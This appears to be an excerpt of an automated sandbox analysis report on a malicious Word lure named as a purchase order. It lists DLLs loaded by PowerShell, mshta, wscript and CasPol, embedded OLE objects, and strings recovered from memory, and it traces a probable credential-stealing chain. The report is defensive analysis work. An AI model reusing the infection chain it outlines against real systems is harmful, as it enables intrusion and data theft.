                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: shcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rstrtmgr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: pstorec.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ucrtbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                  Source: PO NAHK22012FA00000.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\PO NAHK22012FA00000.docx.doc
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: PO NAHK22012FA00000.docx.docInitial sample: OLE zip file path = word/_rels/footer2.xml.rels
                  Source: PO NAHK22012FA00000.docx.docInitial sample: OLE zip file path = word/embeddings/oleObject3.bin
                  Source: PO NAHK22012FA00000.docx.docInitial sample: OLE zip file path = word/media/image3.emf
                  Source: PO NAHK22012FA00000.docx.docInitial sample: OLE zip file path = word/embeddings/oleObject2.bin
                  Source: PO NAHK22012FA00000.docx.docInitial sample: OLE zip file path = word/media/image2.emf
                  Source: PO NAHK22012FA00000.docx.docInitial sample: OLE zip file path = word/_rels/settings.xml.rels
                  Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/_rels/footer2.xml.rels
                  Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/media/image3.emf
                  Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/embeddings/oleObject3.bin
                  Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/media/image2.emf
                  Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/embeddings/oleObject2.bin
                  Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/_rels/settings.xml.rels
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                  Source: ~WRD0000.tmp.0.drInitial sample: OLE summary template = 54D5D963
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000013.00000002.514711440.0000000000250000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\New Private Panell Src 3.0\Microsoft.Win32.TaskScheduler Rump\obj\Release\net45\Microsoft.Win32.TaskScheduler.pdbSHA256 source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000013.00000002.514711440.0000000000250000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17a source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
